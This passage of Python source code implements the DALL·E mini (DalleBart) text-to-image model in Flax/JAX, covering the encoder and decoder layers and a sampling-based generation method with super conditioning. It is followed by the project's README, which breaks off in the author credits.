num_heads=self.config.decoder_attention_heads, dropout=self.config.attention_dropout, bias=self.config.use_bias, dtype=self.dtype, is_encoder=False, is_cross_attention=True, q_length=self.config.image_length, k_length=self.config.max_text_length, )( hidden_states=hidden_states, key_value_states=encoder_hidden_states, attention_mask=encoder_attention_mask, ) if self.config.ln_positions in ["normformer", "swinv2", "cogview"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 )(hidden_states) hidden_states = nn.Dropout(rate=self.config.dropout)( hidden_states, deterministic=deterministic ) hidden_states = residual * res_gain + hidden_states if self.config.ln_positions in ["postln"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 )(hidden_states) # Feed forward residual = hidden_states ff_block = ( GLU( config=self.config, ffn_dim=self.config.decoder_ffn_dim, embed_dim=embed_dim, dtype=self.dtype, is_encoder=False, ) if self.config.use_glu else FFN( config=self.config, ffn_dim=self.config.decoder_ffn_dim, embed_dim=embed_dim, dtype=self.dtype, is_encoder=False, ) ) hidden_states = ff_block(hidden_states, deterministic=deterministic) hidden_states = residual * res_gain + hidden_states if self.add_norm: use_scale = self.use_scale or self.config.force_ln_scale hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=use_scale, )(hidden_states) outputs = (hidden_states,) if output_attentions: outputs += (attn_weights, cross_attn_weights) if self.config.use_scan: outputs = (outputs, None) return outputs class FlaxBartEncoderLayerCollection(nn.Module): config: DalleBartConfig dtype: jnp.dtype = jnp.float32 # the dtype of the computation """ Edits: - use custom FlaxBartEncoderLayer - allow Gradient Checkpointing (nn.remat) """ @nn.compact def __call__( self, hidden_states, attention_mask, deterministic: bool = True, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, ): all_hidden_states = () if output_hidden_states else None all_self_attns = () if output_attentions else None n_layers = self.config.encoder_layers layer = ( remat( FlaxBartEncoderLayer, static_argnums=(2, 3), prevent_cse=not self.config.use_scan, ) if self.config.gradient_checkpointing else FlaxBartEncoderLayer ) if self.config.use_scan: # all blocks are the same so we use nn.scan assert not output_attentions, "cannot scan with output_attentions" assert not output_hidden_states, "cannot scan with output_hidden_states" hidden_states = (hidden_states,) # we use a scale on all norms (even last layer) to allow scanning hidden_states, _ = nn.scan( layer, variable_axes={"params": 0, "cache": 0}, split_rngs={"params": True, "dropout": True}, in_axes=(nn.broadcast, nn.broadcast, nn.broadcast), length=n_layers, )( self.config, dtype=self.dtype, add_norm=self.config.ln_positions == "postln", name="FlaxBartEncoderLayers", )( hidden_states, attention_mask, output_attentions, deterministic, ) hidden_states = hidden_states[0] else: for i in range(n_layers): if output_hidden_states: all_hidden_states += (hidden_states,) # final layernorm on the output of the last layer # or every 6 layers for Swin v2 add_norm = self.config.ln_positions == "postln" or ( self.config.ln_positions == "swinv2" and ((i + 1) % 6 == 0) and (i != n_layers - 1) ) # we don't need to scale the norm for the last layer use_scale = i != n_layers - 1 layer_outputs = layer( self.config, dtype=self.dtype, add_norm=add_norm, use_scale=use_scale, 
name=f"FlaxBartEncoderLayer_{i}", )( hidden_states, attention_mask, output_attentions, deterministic, ) hidden_states = layer_outputs[0] if output_attentions: all_self_attns += (layer_outputs[1],) # add hidden states from the last layer if output_hidden_states: all_hidden_states += (hidden_states,) outputs = [ hidden_states, all_hidden_states, all_self_attns, ] if not return_dict: return tuple(v for v in outputs if v is not None) return FlaxBaseModelOutput( last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_self_attns, ) class FlaxBartDecoderLayerCollection(nn.Module): config: DalleBartConfig dtype: jnp.dtype = jnp.float32 # the dtype of the computation """ Edits: - use custom FlaxBartDecoderLayer - allow Gradient Checkpointing (nn.remat) """ @nn.compact def __call__( self, hidden_states, attention_mask, encoder_hidden_states: Optional[jnp.ndarray] = None, encoder_attention_mask: Optional[jnp.ndarray] = None, deterministic: bool = True, init_cache: bool = False, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, ): # decoder layers all_hidden_states = () if output_hidden_states else None all_self_attns = () if output_attentions else None all_cross_attentions = ( () if (output_attentions and encoder_hidden_states is not None) else None ) n_layers = self.config.decoder_layers layer = ( remat( FlaxBartDecoderLayer, static_argnums=(4, 5, 6), prevent_cse=not self.config.use_scan, ) if self.config.gradient_checkpointing else FlaxBartDecoderLayer ) if self.config.use_scan: # all blocks are the same so we use nn.scan assert not output_attentions, "cannot scan with output_attentions" assert not output_hidden_states, "cannot scan with output_hidden_states" hidden_states = (hidden_states,) # we use a scale on all norms (even last layer) to allow scanning hidden_states, _ = nn.scan( layer, variable_axes={"params": 0, "cache": 0}, split_rngs={"params": True, "dropout": True}, in_axes=( nn.broadcast, nn.broadcast, nn.broadcast, nn.broadcast, nn.broadcast, nn.broadcast, ), length=n_layers, )( self.config, dtype=self.dtype, add_norm=self.config.ln_positions == "postln", name="FlaxBartDecoderLayers", )( hidden_states, attention_mask, encoder_hidden_states, encoder_attention_mask, init_cache, output_attentions, deterministic, ) hidden_states = hidden_states[0] else: for i in range(n_layers): if output_hidden_states: all_hidden_states += (hidden_states,) # final layernorm on the output of the last layer # or every 6 layers for Swin v2 add_norm = self.config.ln_positions == "postln" or ( self.config.ln_positions == "swinv2" and ((i + 1) % 6 == 0) and (i != n_layers - 1) ) # we don't need to scale the norm for the last layer use_scale = i != n_layers - 1 layer_outputs = layer( self.config, dtype=self.dtype, add_norm=add_norm, use_scale=use_scale, name=f"FlaxBartDecoderLayer_{i}", )( hidden_states, attention_mask, encoder_hidden_states, encoder_attention_mask, init_cache, output_attentions, deterministic, ) hidden_states = layer_outputs[0] if output_attentions: all_self_attns += (layer_outputs[1],) if encoder_hidden_states is not None: all_cross_attentions += (layer_outputs[2],) # add hidden states from the last decoder layer if output_hidden_states: all_hidden_states += (hidden_states,) outputs = [ hidden_states, all_hidden_states, all_self_attns, all_cross_attentions, ] if not return_dict: return tuple(v for v in outputs if v is not None) return FlaxBaseModelOutputWithPastAndCrossAttentions( last_hidden_state=hidden_states, 
hidden_states=all_hidden_states, attentions=all_self_attns, cross_attentions=all_cross_attentions, ) class FlaxBartEncoder(nn.Module): config: DalleBartConfig embed_tokens: nn.Embed dtype: jnp.dtype = jnp.float32 # the dtype of the computation """ Edits: - offset set to 0 (no padding token) - use max_text_length instead of max_position_embeddings - use custom FlaxBartEncoderLayerCollection - embed_tokens cannot be None (issue at compile time) """ def setup(self): self.dropout_layer = nn.Dropout(rate=self.config.dropout) embed_dim = self.config.d_model self.padding_idx = self.config.pad_token_id self.embed_scale = math.sqrt(embed_dim) if self.config.scale_embedding else 1.0 # Bart is set up so that if padding_idx is specified then offset the embedding ids by 2 # and adjust num_embeddings appropriately. Other models don't have this hack self.offset = 0 if self.config.use_absolute_position_embeddings: self.embed_positions = nn.Embed( self.config.max_text_length + self.offset, # image length for BOS embed_dim, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) self.layers = FlaxBartEncoderLayerCollection(self.config, self.dtype) self.layernorm_embedding = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 ) # postln is already applied in every layer if self.config.use_final_ln_encoder and self.config.ln_positions != "postln": self.final_ln = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, ) else: self.final_ln = None def __call__( self, input_ids, attention_mask, position_ids, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, deterministic: bool = True, ): input_shape = input_ids.shape input_ids = input_ids.reshape(-1, input_shape[-1]) hidden_states = self.embed_tokens(input_ids) * self.embed_scale if self.config.use_absolute_position_embeddings: embed_pos = self.embed_positions(position_ids + self.offset) hidden_states = hidden_states + embed_pos hidden_states = self.layernorm_embedding(hidden_states) hidden_states = self.dropout_layer(hidden_states, deterministic=deterministic) outputs = self.layers( hidden_states, attention_mask, deterministic=deterministic, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) if self.final_ln is None: final_output = outputs[0] else: final_output = self.final_ln(outputs[0]) if not return_dict: return (final_output,) + outputs[1:] return FlaxBaseModelOutput( last_hidden_state=final_output, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) class FlaxBartDecoder(nn.Module): config: DalleBartConfig embed_tokens: nn.Embed dtype: jnp.dtype = jnp.float32 # the dtype of the computation """ Edits: - offset set to 0 (no padding token) - use image_length instead of max_position_embeddings - use custom FlaxBartDecoderLayerCollection - embed_tokens cannot be None (issue at compile time) """ def setup(self): self.dropout_layer = nn.Dropout(rate=self.config.dropout) embed_dim = self.config.d_model self.padding_idx = self.config.pad_token_id self.embed_scale = ( math.sqrt(self.config.d_model) if self.config.scale_embedding else 1.0 ) # Bart is set up so that if padding_idx is specified then offset the embedding ids by 2 # and adjust num_embeddings appropriately. 
Other models don't have this hack self.offset = 0 if self.config.use_absolute_position_embeddings: self.embed_positions = nn.Embed( self.config.image_length + self.offset, # image length for BOS embed_dim, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) self.layers = FlaxBartDecoderLayerCollection(self.config, self.dtype) self.layernorm_embedding = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 ) # postln is already applied in every layer if self.config.use_final_ln_decoder and self.config.ln_positions != "postln": self.final_ln = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, ) def __call__( self, input_ids, attention_mask, position_ids, encoder_hidden_states: Optional[jnp.ndarray] = None, encoder_attention_mask: Optional[jnp.ndarray] = None, init_cache: bool = False, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, deterministic: bool = True, ): input_shape = input_ids.shape input_ids = input_ids.reshape(-1, input_shape[-1]) hidden_states = self.embed_tokens(input_ids) * self.embed_scale if self.config.use_absolute_position_embeddings: embed_pos = self.embed_positions(position_ids + self.offset) hidden_states = hidden_states + embed_pos hidden_states = self.layernorm_embedding(hidden_states) hidden_states = self.dropout_layer(hidden_states, deterministic=deterministic) outputs = self.layers( hidden_states, attention_mask, encoder_hidden_states, encoder_attention_mask, deterministic=deterministic, init_cache=init_cache, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) if self.final_ln is None: final_output = outputs[0] else: final_output = self.final_ln(outputs[0]) if not return_dict: return (final_output,) + outputs[1:] return FlaxBaseModelOutputWithPastAndCrossAttentions( last_hidden_state=final_output, hidden_states=outputs.hidden_states, attentions=outputs.attentions, cross_attentions=outputs.cross_attentions, ) class FlaxBartModule(FlaxBartModule): """ Edits - use custom FlaxBartEncoder & FlaxBartDecoder - use separate embeddings for Encoder & Decoder """ def setup(self): encoder_embed_tokens = nn.Embed( self.config.encoder_vocab_size, self.config.d_model, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) decoder_embed_tokens = nn.Embed( self.config.image_vocab_size + 1, # image vocab size + 1 for BOS self.config.d_model, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) self.encoder = FlaxBartEncoder( self.config, dtype=self.dtype, embed_tokens=encoder_embed_tokens ) self.decoder = FlaxBartDecoder( self.config, dtype=self.dtype, embed_tokens=decoder_embed_tokens ) class FlaxBartForConditionalGenerationModule(FlaxBartForConditionalGenerationModule): """ Edits: - no bias - lm_head set to image_vocab_size + 1 (for BOS) - uses custom FlaxBartModule """ def setup(self): self.model = FlaxBartModule(config=self.config, dtype=self.dtype) self.lm_head = nn.Dense( self.config.image_vocab_size + 1, # image vocab size + 1 for BOS to have same size as decoder inputs (for sharding) use_bias=False, dtype=self.dtype, kernel_init=jax.nn.initializers.normal(self.config.init_std), ) def __call__( self, input_ids, attention_mask, decoder_input_ids, decoder_attention_mask, position_ids, decoder_position_ids, output_attentions: bool = False, output_hidden_states: bool = False, return_dict: bool = True, deterministic: bool = True, ): outputs = self.model( input_ids=input_ids, 
attention_mask=attention_mask, decoder_input_ids=decoder_input_ids, decoder_attention_mask=decoder_attention_mask, position_ids=position_ids, decoder_position_ids=decoder_position_ids, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, deterministic=deterministic, ) hidden_states = outputs[0] if self.config.tie_word_embeddings: shared_embedding = self.model.variables["params"]["shared"]["embedding"] lm_logits = self.lm_head.apply( {"params": {"kernel": shared_embedding.T}}, hidden_states ) else: lm_logits = self.lm_head(hidden_states) if not return_dict: output = (lm_logits,) + outputs[1:] return output return FlaxSeq2SeqLMOutput( logits=lm_logits, decoder_hidden_states=outputs.decoder_hidden_states, decoder_attentions=outputs.decoder_attentions, cross_attentions=outputs.cross_attentions, encoder_last_hidden_state=outputs.encoder_last_hidden_state, encoder_hidden_states=outputs.encoder_hidden_states, encoder_attentions=outputs.encoder_attentions, ) @flax.struct.dataclass class SampleState: cur_len: jnp.ndarray sequences: jnp.ndarray running_token: jnp.ndarray is_sent_finished: jnp.ndarray prng_key: jnp.ndarray model_kwargs: Dict[str, jnp.ndarray] model_kwargs_uncond: Dict[str, jnp.ndarray] @flax.struct.dataclass class FlaxSampleOutput(ModelOutput): """ Flax Base class for outputs of decoder-only generation models using sampling. Args: sequences (`jnp.ndarray` of shape `(batch_size, max_length)`): The generated sequences. """ sequences: jnp.ndarray = None class DalleBart(PretrainedFromWandbMixin, FlaxBartForConditionalGeneration): """ Edits: - renamed from FlaxBartForConditionalGeneration - uses custom FlaxBartForConditionalGenerationModule - no bias in decode method - custom prepare_inputs_for_generation using "max_length - 1" to avoid issues related to position embedding during model.generate() - custom generate method to allow super conditions - num_params property - unscan function """ module_class = FlaxBartForConditionalGenerationModule config_class = DalleBartConfig def num_params(self, params=None): if params is None: params = self.params num_params = jax.tree_util.tree_map( lambda param: param.size, flatten_dict(unfreeze(params)) ).values() return sum(list(num_params)) def unscan(self, params): if self.config.use_scan: self.config.use_scan = False params = flatten_dict(params) scanned_keys = [k for k in params.keys() if "layers" in k] for k in scanned_keys: v = params[k] name_idx = k.index("layers") + 1 for i in range(len(v)): new_k = ( *k[:name_idx], f"{k[name_idx][:-1]}_{i}", *k[name_idx + 1 :], ) params[new_k] = v[i] del params[k] params = unflatten_dict(params) return params def decode( self, decoder_input_ids, encoder_outputs, encoder_attention_mask: Optional[jnp.ndarray] = None, decoder_attention_mask: Optional[jnp.ndarray] = None, decoder_position_ids: Optional[jnp.ndarray] = None, past_key_values: dict = None, output_attentions: Optional[bool] = None, output_hidden_states: Optional[bool] = None, return_dict: Optional[bool] = None, train: bool = False, params: dict = None, dropout_rng: PRNGKey = None, ): output_attentions = ( output_attentions if output_attentions is not None else self.config.output_attentions ) output_hidden_states = ( output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states ) return_dict = ( return_dict if return_dict is not None else self.config.return_dict ) encoder_hidden_states = encoder_outputs[0] if encoder_attention_mask is None: batch_size, sequence_length = 
encoder_hidden_states.shape[:2] encoder_attention_mask = jnp.ones((batch_size, sequence_length)) batch_size, sequence_length = decoder_input_ids.shape if decoder_attention_mask is None: decoder_attention_mask = jnp.ones((batch_size, sequence_length)) if decoder_position_ids is None: if past_key_values is not None: raise ValueError( "Make sure to provide `decoder_position_ids` when passing `past_key_values`." ) decoder_position_ids = jnp.broadcast_to( jnp.arange(sequence_length)[None, :], (batch_size, sequence_length) ) # Handle any PRNG if needed rngs = {} if dropout_rng is not None: rngs["dropout"] = dropout_rng inputs = {"params": params or self.params} # if past_key_values are passed then cache is already initialized a private flag init_cache has to be # passed down to ensure cache is used. It has to be made sure that cache is marked as mutable so that # it can be changed by FlaxBartAttention module if past_key_values: inputs["cache"] = past_key_values mutable = ["cache"] else: mutable = False def _decoder_forward( module, decoder_input_ids, decoder_attention_mask, decoder_position_ids, **kwargs, ): decoder_module = module._get_decoder_module() outputs = decoder_module( decoder_input_ids, decoder_attention_mask, decoder_position_ids, **kwargs, ) hidden_states = outputs[0] if self.config.tie_word_embeddings: shared_embedding = module.model.variables["params"]["shared"][ "embedding" ] lm_logits = module.lm_head.apply( {"params": {"kernel": shared_embedding.T}}, hidden_states ) else: lm_logits = module.lm_head(hidden_states) return lm_logits, outputs outputs = self.module.apply( inputs, decoder_input_ids=jnp.array(decoder_input_ids, dtype="i4"), decoder_attention_mask=jnp.array(decoder_attention_mask, dtype="i4"), decoder_position_ids=jnp.array(decoder_position_ids, dtype="i4"), encoder_hidden_states=encoder_hidden_states, encoder_attention_mask=jnp.array(encoder_attention_mask, dtype="i4"), output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, deterministic=not train, rngs=rngs, mutable=mutable, method=_decoder_forward, ) if past_key_values is None: lm_logits, decoder_outputs = outputs else: (lm_logits, decoder_outputs), past = outputs if return_dict: outputs = FlaxCausalLMOutputWithCrossAttentions( logits=lm_logits, hidden_states=decoder_outputs.hidden_states, attentions=decoder_outputs.attentions, cross_attentions=decoder_outputs.cross_attentions, ) else: outputs = (lm_logits,) + decoder_outputs[1:] # add updated cache to model output if past_key_values is not None and return_dict: outputs["past_key_values"] = unfreeze(past["cache"]) return outputs elif past_key_values is not None and not return_dict: outputs = outputs[:1] + (unfreeze(past["cache"]),) + outputs[1:] return outputs def prepare_inputs_for_generation( self, decoder_input_ids, max_length, attention_mask: Optional[jnp.DeviceArray] = None, decoder_attention_mask: Optional[jnp.DeviceArray] = None, encoder_outputs=None, **kwargs, ): # initializing the cache batch_size, seq_length = decoder_input_ids.shape past_key_values = self.init_cache(batch_size, max_length - 1, encoder_outputs) # Note that usually one would have to put 0's in the attention_mask for x > input_ids.shape[-1] and x < cache_length. # But since the decoder uses a causal mask, those positions are masked anyways. 
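        # (position i can only attend to cached positions <= i, so the 1's placed beyond the real prompt length are never actually visible).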
# Thus we can create a single static attention_mask here, which is more efficient for compilation extended_attention_mask = jnp.ones((batch_size, max_length - 1), dtype="i4") if decoder_attention_mask is not None: position_ids = decoder_attention_mask.cumsum(axis=-1) - 1 extended_attention_mask = lax.dynamic_update_slice( extended_attention_mask, decoder_attention_mask, (0, 0) ) else: position_ids = jnp.broadcast_to( jnp.arange(seq_length, dtype="i4")[None, :], (batch_size, seq_length) ) return { "past_key_values": past_key_values, "encoder_outputs": encoder_outputs, "encoder_attention_mask": attention_mask, "decoder_attention_mask": extended_attention_mask, "decoder_position_ids": position_ids, } def generate( self, input_ids: jnp.ndarray, attention_mask: Optional[jnp.ndarray] = None, max_length: Optional[int] = None, pad_token_id: Optional[int] = None, bos_token_id: Optional[int] = None, eos_token_id: Optional[int] = None, decoder_start_token_id: Optional[int] = None, do_sample: Optional[bool] = None, prng_key: Optional[jnp.ndarray] = None, top_k: Optional[int] = None, top_p: Optional[float] = None, temperature: Optional[float] = None, num_beams: Optional[int] = None, no_repeat_ngram_size: Optional[int] = None, min_length: Optional[int] = None, forced_bos_token_id: Optional[int] = None, forced_eos_token_id: Optional[int] = None, length_penalty: Optional[float] = None, early_stopping: Optional[bool] = None, trace: bool = True, params: Optional[Dict[str, jnp.ndarray]] = None, condition_scale: Optional[float] = 1.0, input_ids_uncond: Optional[jnp.ndarray] = None, attention_mask_uncond: Optional[jnp.ndarray] = None, **model_kwargs, ): """Edit: Allow super conditioning.""" # set init values max_length = max_length if max_length is not None else self.config.max_length bos_token_id = ( bos_token_id if bos_token_id is not None else self.config.bos_token_id ) pad_token_id = ( pad_token_id if pad_token_id is not None else self.config.pad_token_id ) eos_token_id = ( eos_token_id if eos_token_id is not None else self.config.eos_token_id ) decoder_start_token_id = ( decoder_start_token_id if decoder_start_token_id else self.config.decoder_start_token_id ) prng_key = prng_key if prng_key is not None else jax.random.PRNGKey(0) if decoder_start_token_id is None and self.config.is_encoder_decoder: raise ValueError( "`decoder_start_token_id` has to be defined for encoder-decoder generation." ) do_sample = do_sample if do_sample is not None else self.config.do_sample num_beams = num_beams if num_beams is not None else self.config.num_beams if self.config.is_encoder_decoder: # add encoder_outputs to model_kwargs if model_kwargs.get("encoder_outputs") is None: model_kwargs_input = dict(model_kwargs) model_kwargs = self._prepare_encoder_decoder_kwargs_for_generation( input_ids, params, {"attention_mask": attention_mask, **model_kwargs_input}, ) if condition_scale != 1.0: assert ( input_ids_uncond is not None ), "`input_ids_uncond` has to be defined for super conditioning." assert ( do_sample is True ), "`do_sample` has to be True for super conditioning." assert ( num_beams == 1 ), "`num_beams` has to be 1 for super conditioning." 
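                # Super conditioning (a.k.a. classifier-free guidance): encoder
                # outputs are also computed for the unconditional prompt and, at
                # each sampling step, the two sets of logits are mixed as
                #   logits = logits_uncond + condition_scale * (logits_cond - logits_uncond)
                # (see `sample_search_body_fn` in `_sample` below).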
model_kwargs_uncond = ( self._prepare_encoder_decoder_kwargs_for_generation( input_ids_uncond, params, { "attention_mask": attention_mask_uncond, **model_kwargs_input, }, ) ) else: model_kwargs_uncond = None # prepare decoder_input_ids for generation input_ids = ( jnp.ones((input_ids.shape[0], 1), dtype="i4") * decoder_start_token_id ) if not do_sample and num_beams == 1: logits_processor = self._get_logits_processor( no_repeat_ngram_size, min_length, max_length, eos_token_id, forced_bos_token_id, forced_eos_token_id, ) return self._greedy_search( input_ids, max_length, pad_token_id, eos_token_id, logits_processor=logits_processor, trace=trace, params=params, model_kwargs=model_kwargs, ) elif do_sample and num_beams == 1: logits_warper = self._get_logits_warper( top_k=top_k, top_p=top_p, temperature=temperature ) logits_processor = self._get_logits_processor( no_repeat_ngram_size, min_length, max_length, eos_token_id, forced_bos_token_id, forced_eos_token_id, ) return self._sample( input_ids, max_length, pad_token_id, eos_token_id, prng_key, logits_warper=logits_warper, logits_processor=logits_processor, trace=trace, params=params, model_kwargs=model_kwargs, condition_scale=condition_scale, model_kwargs_uncond=model_kwargs_uncond, ) elif not do_sample and num_beams > 1: # broadcast input_ids & encoder_outputs input_ids = self._expand_to_num_beams(input_ids, num_beams=num_beams) if "encoder_outputs" in model_kwargs: model_kwargs["encoder_outputs"][ "last_hidden_state" ] = self._expand_to_num_beams( model_kwargs["encoder_outputs"]["last_hidden_state"], num_beams=num_beams, ) if "attention_mask" in model_kwargs: model_kwargs["attention_mask"] = self._expand_to_num_beams( model_kwargs["attention_mask"], num_beams=num_beams ) logits_processor = self._get_logits_processor( no_repeat_ngram_size, min_length, max_length, eos_token_id, forced_bos_token_id, forced_eos_token_id, ) return self._beam_search( input_ids, max_length, pad_token_id, eos_token_id, length_penalty=length_penalty, early_stopping=early_stopping, logits_processor=logits_processor, trace=trace, params=params, model_kwargs=model_kwargs, ) else: raise NotImplementedError("`Beam sampling is currently not implemented.") def _sample( self, input_ids: None, max_length: Optional[int] = None, pad_token_id: Optional[int] = None, eos_token_id: Optional[int] = None, prng_key: Optional[jnp.ndarray] = None, logits_processor=None, logits_warper=None, trace: bool = True, params: Optional[Dict[str, jnp.ndarray]] = None, model_kwargs: Optional[Dict[str, jnp.ndarray]] = None, condition_scale: float = 1.0, model_kwargs_uncond: Optional[Dict[str, jnp.ndarray]] = None, ): # init values max_length = max_length if max_length is not None else self.config.max_length pad_token_id = ( pad_token_id if pad_token_id is not None else self.config.pad_token_id ) eos_token_id = ( eos_token_id if eos_token_id is not None else self.config.eos_token_id ) prng_key = prng_key if prng_key is not None else jax.random.PRNGKey(0) batch_size, cur_len = input_ids.shape eos_token_id = jnp.array(eos_token_id) pad_token_id = jnp.array(pad_token_id) cur_len = jnp.array(cur_len) # per batch-item holding current token in loop. sequences = jnp.full((batch_size, max_length), pad_token_id, dtype=jnp.int32) sequences = lax.dynamic_update_slice(sequences, input_ids, (0, 0)) # per batch-item state bit indicating if sentence has finished. 
is_sent_finished = jnp.zeros((batch_size,), dtype=jnp.bool_) # For Seq2Seq generation, we only need to use the decoder instead of the whole model in generation loop # and pass it the `encoder_outputs`, which are part of the `model_kwargs`. model = self.decode if self.config.is_encoder_decoder else self # initialize model specific kwargs model_kwargs = self.prepare_inputs_for_generation( input_ids, max_length, **model_kwargs ) if condition_scale != 1.0: model_kwargs_uncond = self.prepare_inputs_for_generation( input_ids, max_length, **model_kwargs_uncond ) # initialize state state = SampleState( cur_len=cur_len, sequences=sequences, running_token=input_ids, is_sent_finished=is_sent_finished, prng_key=prng_key, model_kwargs=model_kwargs, model_kwargs_uncond=model_kwargs_uncond, ) def sample_search_cond_fn(state): """state termination condition fn.""" has_reached_max_length = state.cur_len == max_length all_sequence_finished = jnp.all(state.is_sent_finished) finish_generation = jnp.logical_or( has_reached_max_length, all_sequence_finished ) return ~finish_generation def sample_search_body_fn(state): """state update fn.""" prng_key, prng_key_next = jax.random.split(state.prng_key) model_outputs = model( state.running_token, params=params, **state.model_kwargs ) logits = model_outputs.logits[:, -1] # perform super conditioning # Source: @RiversHaveWings - https://twitter.com/RiversHaveWings/status/1478093658716966912?s=20&t=xdm-wZ61Wf7OLnE_NJHZ1w if condition_scale != 1.0: model_outputs_uncond = model( state.running_token, params=params, **state.model_kwargs_uncond ) logits_uncond = model_outputs_uncond.logits[:, -1] logits = logits_uncond + condition_scale * (logits - logits_uncond) else: model_outputs_uncond = None # apply min_length, ... logits = logits_processor(state.sequences, logits, state.cur_len) # apply top_k, top_k, temperature logits = logits_warper(logits, logits, state.cur_len) next_token = jax.random.categorical(prng_key, logits, axis=-1) next_is_sent_finished = state.is_sent_finished | ( next_token == eos_token_id ) next_token = ( next_token * ~next_is_sent_finished + pad_token_id * next_is_sent_finished ) next_token = next_token[:, None] next_sequences = lax.dynamic_update_slice( state.sequences, next_token, (0, state.cur_len) ) next_model_kwargs = self.update_inputs_for_generation( model_outputs, state.model_kwargs ) next_model_kwargs_uncond = ( self.update_inputs_for_generation( model_outputs_uncond, state.model_kwargs_uncond ) if condition_scale != 1.0 else None ) return SampleState( cur_len=state.cur_len + 1, sequences=next_sequences, running_token=next_token, is_sent_finished=next_is_sent_finished, model_kwargs=next_model_kwargs, model_kwargs_uncond=next_model_kwargs_uncond, prng_key=prng_key_next, ) # The very first prompt often has sequence length > 1, so run outside of `lax.while_loop` to comply with TPU if input_ids.shape[1] > 1: state = sample_search_body_fn(state) if not trace: state = self._run_loop_in_debug( sample_search_cond_fn, sample_search_body_fn, state ) else: state = lax.while_loop(sample_search_cond_fn, sample_search_body_fn, state) return FlaxSampleOutput(sequences=state.sequences)
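
# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only; the artifact names below are
# placeholders, real weights come from the published wandb / 🤗 Hub artifacts,
# and decoding the generated image tokens requires the separate VQGAN model):
#
#   import jax
#   from dalle_mini import DalleBart, DalleBartProcessor
#
#   model, params = DalleBart.from_pretrained(
#       "dalle-mini/dalle-mini/mega-1-fp16:latest", _do_init=False
#   )
#   processor = DalleBartProcessor.from_pretrained(
#       "dalle-mini/dalle-mini/mega-1-fp16:latest"
#   )
#   tokenized = processor(["an armchair in the shape of an avocado"])
#   encoded = model.generate(
#       **tokenized,
#       params=params,
#       prng_key=jax.random.PRNGKey(0),
#       do_sample=True,
#       top_k=50,
#       condition_scale=10.0,  # super conditioning; 1.0 disables it
#   )
#   image_tokens = encoded.sequences[..., 1:]  # drop BOS, then decode with VQGAN
# ---------------------------------------------------------------------------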
# DALL·E Mini <a href="https://www.craiyon.com/"><img src="https://www.craiyon.com/thumbnail.png" width="300"></a> ## How to use it? You can use the model on [🖍️ craiyon](https://www.craiyon.com/) ## How does it work? Refer to our reports: * [DALL·E mini - Generate Images from Any Text Prompt](https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-mini-Generate-images-from-any-text-prompt--VmlldzoyMDE4NDAy) * [DALL·E mini - Explained](https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-Mini-Explained-with-Demo--Vmlldzo4NjIxODA) * [DALL·E mega - Training Journal](https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-Mega-Training-Journal--VmlldzoxODMxMDI2) ## Development ### Dependencies Installation For inference only, use `pip install dalle-mini`. For development, clone the repo and use `pip install -e ".[dev]"`. Before making a PR, check style with `make style`. You can experiment with the pipeline step by step through our [`inference pipeline notebook`](tools/inference/inference_pipeline.ipynb) [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/borisdayma/dalle-mini/blob/main/tools/inference/inference_pipeline.ipynb) ### Training of DALL·E mini Use [`tools/train/train.py`](tools/train/train.py). You can also adjust the [sweep configuration file](https://docs.wandb.ai/guides/sweeps) if you need to perform a hyperparameter search. ## FAQ ### Where to find the latest models? Trained models are on 🤗 Model Hub: * [VQGAN-f16-16384](https://huggingface.co/dalle-mini/vqgan_imagenet_f16_16384) for encoding/decoding images * [DALL·E mini](https://huggingface.co/dalle-mini/dalle-mini) or [DALL·E mega](https://huggingface.co/dalle-mini/dalle-mega) for generating images from a text prompt ### Where does the logo come from? The "armchair in the shape of an avocado" was used by OpenAI when releasing DALL·E to illustrate the model's capabilities. Having successful predictions on this prompt represents a big milestone for us. ## Contributing Join the community on the [LAION Discord](https://discord.gg/xBPBXfcFHd). Any contribution is welcome, from reporting issues to proposing fixes/improvements or testing the model with cool prompts! 
You can also use these great projects from the community: * spin off your own app with [DALL-E Playground repository](https://github.com/saharmor/dalle-playground) (thanks [Sahar](https://twitter.com/theaievangelist)) * try [DALL·E Flow](https://github.com/jina-ai/dalle-flow) project for generating, diffusion, and upscaling in a Human-in-the-Loop workflow (thanks [Han Xiao](https://github.com/hanxiao)) [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/jina-ai/dalle-flow/blob/main/client.ipynb) * run on [Replicate](https://replicate.com/borisdayma/dalle-mini), in the browser or via API ## Acknowledgements * 🤗 Hugging Face for organizing [the FLAX/JAX community week](https://github.com/huggingface/transformers/tree/master/examples/research_projects/jax-projects) * Google [TPU Research Cloud (TRC) program](https://sites.research.google/trc/) for providing computing resources * [Weights & Biases](https://wandb.com/) for providing the infrastructure for experiment tracking and model management ## Authors & Contributors DALL·E mini was initially developed by: * [Boris Dayma](https://github.com/borisdayma) * [Suraj Patil](https://github.com/patil-suraj) * 